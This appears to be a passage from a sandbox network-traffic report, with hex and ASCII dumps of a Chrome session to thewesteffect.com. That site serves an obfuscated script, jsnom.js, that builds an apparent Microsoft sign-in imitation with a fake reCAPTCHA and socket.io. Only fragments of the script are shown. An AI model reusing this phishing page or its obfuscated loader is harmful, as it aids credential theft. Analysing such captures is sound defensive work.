                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                                                                                                                                                                                            Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                                                                                                                                                                                            Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC8000INData Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                            Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.44974813.35.58.61443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:43 UTC568OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.socket.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Origin: https://thewesteffect.com
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 49993
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                            Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                                                                                                                                                            Date: Thu, 05 Sep 2024 12:10:03 GMT
                                                                                                                                                                                                                                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                                                                                                                                                                                            Server: Vercel
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                            X-Vercel-Cache: HIT
                                                                                                                                                                                                                                            X-Vercel-Id: fra1::qxsjc-1725538203767-a565e46decc2
                                                                                                                                                                                                                                            X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                            Via: 1.1 2809edb23da5b1de8a640a251efb8608.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                            X-Amz-Cf-Pop: FRA60-P10
                                                                                                                                                                                                                                            X-Amz-Cf-Id: ABKInGu8qyq3y2OYIc3-MAB1S7ZB2nMZuvUWKNco9WTciA18Hxno9Q==
                                                                                                                                                                                                                                            Age: 6859756
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                                                                                                                                                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                                                                                                                                                                                                            Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                                                                                                                                                                                                            Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                                                                                                                                                                                                                            Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.449750192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC351OUTGET /n/jsnom.js HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:44 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Nov 2024 07:43:41 GMT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 100217
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                                                                                                                                                                                            Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                                                                                                                                                                                                                            Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:44 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                                                                                                                                            Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                                                                                                                                                                                                                            Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                                                                                                                                                                                                                            Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                                                                                                                                                                                            Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
                                                                                                                                                                                                                                            2024-11-14 12:01:45 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
